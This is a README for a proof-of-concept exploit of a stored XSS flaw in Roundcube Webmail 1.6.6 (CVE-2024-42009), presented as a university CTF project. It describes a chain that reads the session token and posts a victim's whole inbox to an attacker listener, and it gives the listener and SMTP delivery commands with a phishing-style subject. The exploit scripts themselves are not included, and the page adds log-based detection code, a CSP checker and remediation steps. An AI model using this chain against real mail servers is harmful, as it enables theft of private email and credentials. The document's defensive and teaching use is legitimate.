## https://sploitus.com/exploit?id=38CC0676-948A-5269-9162-8B92F853D747
# CVE-2024-42009 — Roundcube Webmail 1.6.6 Stored XSS PoC

> **For authorised security testing, CTF environments, and educational research only.**  
> Using this tool against systems you do not own or have written permission to test is illegal under the Computer Misuse Act 1990 (UK), the CFAA (US), and equivalent laws worldwide.

---

## Vulnerability Summary

| Field | Detail |
|-------|--------|
| CVE | CVE-2024-42009 |
| Affected Software | Roundcube Webmail ≤ 1.6.6 |
| Patched Version | 1.6.7 / 1.6.8 |
| CVSS v3.1 Score | 8.8 (High) |
| CVSS Vector | AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N |
| CWE | CWE-79 — Improper Neutralisation of Input During Web Page Generation (XSS) |
| Attack Type | Stored XSS → Zero-click email exfiltration |
| Authentication Required | None (SMTP delivery); Low (victim must open the email) |

---

## How It Works

Roundcube 1.6.6's HTML sanitiser fails to strip JavaScript event handlers attached to CSS animation keyframes within a malformed `` tag attribute.

**Injection vector:**

```html
@keyframes x { from { opacity: 1; } to { opacity: 1; } }

```

When the victim opens the email in their authenticated Roundcube session, the CSS animation fires immediately. The `onanimationstart` handler executes with full access to the `rcmail` JavaScript object, including the session's `request_token`.

**Exploit chain:**

```
1. Attacker sends malicious HTML email to victim via unauthenticated SMTP relay (port 25)
2. Victim opens email in Roundcube — animation fires, JS executes (zero clicks required)
3. JS reads rcmail.env.request_token (valid CSRF token for the session)
4. JS iterates all inbox UIDs via Roundcube's internal mail API
5. Each message is fetched and its content collected
6. All inbox data is POSTed as JSON to the attacker's HTTP listener
7. Attacker reads recovered emails — may contain credentials, session data, or sensitive communications
```

---

## Repository Structure

```
cve-2024-42009-roundcube-xss/
├── exploit.py       # Sends the XSS payload via unauthenticated SMTP
├── listener.py      # CORS-capable HTTP server; receives and prints exfiltrated inbox data
├── payload.html     # Standalone XSS payload for manual inspection or Burp delivery
└── README.md
```

---

## Requirements

- Python 3.7+
- No external dependencies (stdlib only: `smtplib`, `http.server`, `json`, `argparse`)
- Target must be running Roundcube ≤ 1.6.6
- Target SMTP server must allow unauthenticated relay on port 25 (common in lab environments)

---

## Usage

### Step 1 — Start the listener (on your attacker machine)

```bash
python3 listener.py --port 8080
```

Output when data arrives:

```
[+] Exfiltration received from 192.168.62.128
[*] Session token : abc123...
[*] Emails captured: 19

  --- Email 1 ---
  UID     : 1
  From    : admin@target.local
  Subject : SSH Access Credentials
  Body    : Your credentials are: ...
```

The full JSON dump is saved automatically to `exfil_dump.json`.

### Step 2 — Deliver the payload

```bash
python3 exploit.py \
  --smtp 192.168.62.128 \
  --port 25 \
  --from attacker@evil.local \
  --to victim@target.local \
  --attacker 192.168.62.129 \
  --lport 8080 \
  --subject "Security Advisory - Action Required"
```

| Argument | Description |
|----------|-------------|
| `--smtp` | IP or hostname of the target SMTP server |
| `--port` | SMTP port (default: 25) |
| `--from` | Sender address (any value accepted by the relay) |
| `--to` | Victim's email address |
| `--attacker` | Your IP — embedded in the payload as the exfil collector |
| `--lport` | Your listener port (default: 8080) |
| `--subject` | Email subject line |

### Step 3 — Wait for the victim to open the email

Once the email is opened in Roundcube ≤ 1.6.6, the listener will print the exfiltrated inbox contents.

---

## Why This Works (Technical Detail)

Roundcube's HTML purifier is responsible for stripping dangerous attributes before rendering incoming email HTML. In versions ≤ 1.6.6, the purifier correctly strips `onclick`, `onerror`, and similar handlers — but does **not** strip event handlers on CSS animation events (`onanimationstart`, `onanimationend`, `onanimationiteration`).

Because CSS animations fire as part of rendering (not user interaction), the handler executes the moment the email is opened — no link click, no user action beyond opening the message.

The `rcmail` JavaScript object is globally accessible in every authenticated Roundcube session. It exposes `rcmail.env.request_token`, which is the session's CSRF token. Combined with Roundcube's own mail API endpoints (`?_task=mail&_action=list`, `?_action=show`), the payload can read the full inbox without triggering additional authentication.
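A defender-side detection for the behaviour just described, added here and not part of the original PoC: because the exfiltration JavaScript runs inside the victim's browser session, steps 4 and 5 of the exploit chain show up in the webmail server's access log as one client opening many distinct messages within seconds, which a normal reader never does. Only `_task=mail` and `_action=show` come from this page; the `_uid`/`_mbox` parameter names, the Apache combined log format and the log lines themselves are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache combined log format and Roundcube's _uid/_mbox parameter names are assumptions.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" \d{3}')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def _line(ip, ts, query):  # constructed sample log line, not captured traffic
    return f'{ip} - - [{ts}] "GET /{query} HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'

SAMPLE_LOG = [  # a normal user reading two messages a few minutes apart ...
    _line("10.0.0.7", "10/Mar/2025:09:00:00 +0000", "?_task=mail&_action=show&_uid=12&_mbox=INBOX"),
    _line("10.0.0.7", "10/Mar/2025:09:04:30 +0000", "?_task=mail&_action=show&_uid=13&_mbox=INBOX"),
    _line("10.0.0.5", "10/Mar/2025:09:10:00 +0000", "?_task=mail&_action=list&_mbox=INBOX"),
] + [  # ... and a hijacked session opening six distinct messages in six seconds
    _line("10.0.0.5", f"10/Mar/2025:09:10:{s:02d} +0000", f"?_task=mail&_action=show&_uid={s}&_mbox=INBOX")
    for s in range(1, 7)
]

def parse_show_request(line):
    """Return (ip, timestamp, uid) for a message-open request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m["path"]).query)
    if qs.get("_task") != ["mail"] or qs.get("_action") != ["show"] or "_uid" not in qs:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), qs["_uid"][0]

def find_bulk_reads(lines, window_s=30, min_uids=5):
    """Return {ip: distinct_uid_count} for clients opening >= min_uids messages within window_s seconds."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_show_request(line)
        if rec:
            events[rec[0]].append((rec[1], rec[2]))
    hits = {}
    for ip, evs in events.items():
        evs.sort()
        lo = 0
        for hi in range(len(evs)):  # sliding window over time-sorted opens
            while (evs[hi][0] - evs[lo][0]).total_seconds() > window_s:
                lo += 1
            seen = {uid for _, uid in evs[lo:hi + 1]}
            if len(seen) >= min_uids:
                hits[ip] = max(hits.get(ip, 0), len(seen))
    return hits
```

Tune `window_s` and `min_uids` against a baseline of real user behaviour before alerting on this, and correlate a hit with the message the session had just opened to find the carrier email.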

---

## Affected Versions

| Version | Status |
|---------|--------|
| ≤ 1.6.6 | Vulnerable |
| 1.6.7   | Patched |
| 1.6.8   | Patched (recommended) |
| 1.5.x LTS | Check vendor advisory |

---

## Remediation

| Action | Detail |
|--------|--------|
| **Upgrade** | Roundcube 1.6.8 or later patches this class of XSS |
| **CSP header** | Deploy `Content-Security-Policy: default-src 'self'; script-src 'self'` on the webmail vhost to block inline JS execution |
| **SMTP relay** | Disable unauthenticated relay on port 25 — require AUTH for all internal delivery |
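An added check for the CSP row above (example code, not from the original repository): it parses a `Content-Security-Policy` value and reports the properties that matter for this bug, using the CSP rule that `script-src` and `connect-src` fall back to `default-src` when absent. `PAGE_CSP` is the header from the table; `WEAK_CSP` is a constructed contrast that would leave both the inline handler and the exfiltration request permitted.

```python
INLINE_ALLOWERS = ("'nonce-", "'sha256-", "'sha384-", "'sha512-")

def parse_csp(header):
    """Parse a Content-Security-Policy value into {directive: [source expressions]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy

def effective(policy, directive):
    """Apply CSP fallback: a fetch directive absent from the policy inherits default-src."""
    return policy.get(directive, policy.get("default-src"))

def csp_findings(header):
    """Return weaknesses relevant to a stored-XSS email body; an empty list means the policy holds."""
    policy = parse_csp(header)
    findings = []
    scripts = effective(policy, "script-src")
    if scripts is None:
        findings.append("no script-src/default-src: inline scripts and on* handlers run")
    else:
        # browsers ignore 'unsafe-inline' only when a nonce/hash or 'strict-dynamic' is present
        inline_on = "'unsafe-inline'" in scripts and not (
            "'strict-dynamic'" in scripts or any(s.startswith(INLINE_ALLOWERS) for s in scripts))
        if inline_on:
            findings.append("'unsafe-inline' in script-src: event-handler attributes execute")
        if "'unsafe-eval'" in scripts:
            findings.append("'unsafe-eval' in script-src: eval()/Function() of injected strings allowed")
        if any(s in ("*", "http:", "https:") for s in scripts):
            findings.append("wildcard script-src: scripts may be loaded from any origin")
    connect = effective(policy, "connect-src")
    if connect is None or any(s in ("*", "http:", "https:") for s in connect):
        findings.append("connect-src permits fetch/XHR to any origin: exfiltration channel open")
    return findings

PAGE_CSP = "default-src 'self'; script-src 'self'"             # header from the Remediation table
WEAK_CSP = "default-src *; script-src 'self' 'unsafe-inline'"   # constructed weak policy for contrast
```

Run it against the header the webmail vhost actually returns, and confirm the Roundcube UI still works under the tightened policy before rolling it out.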

---

## References

- [Roundcube Security Advisory](https://roundcube.net/news/2024/08/04/security-update-1.6.8-released)
- [NVD — CVE-2024-42009](https://nvd.nist.gov/vuln/detail/CVE-2024-42009)
- [OWASP Top 10 A03 — Injection](https://owasp.org/Top10/A03_2021-Injection/)

---

## Discovered / Demonstrated By

This PoC was developed and tested as part of a Boot-to-Root CTF penetration testing assessment in the **Ethical Hacking and Penetration Testing** module, MSc Cybersecurity, Coventry University (2025–2026). All testing was conducted in an isolated VMware lab environment with explicit written authorisation.

Author: **Segun Akinsoyinu**  
Portfolio: [segunakinsoyinu.github.io/MyPortfolio](https://segunakinsoyinu.github.io/MyPortfolio)

---

## Legal Notice

This code is released for **educational and authorised security research purposes only**. The author accepts no liability for misuse. Before using this tool, confirm you have explicit written authorisation to test the target system.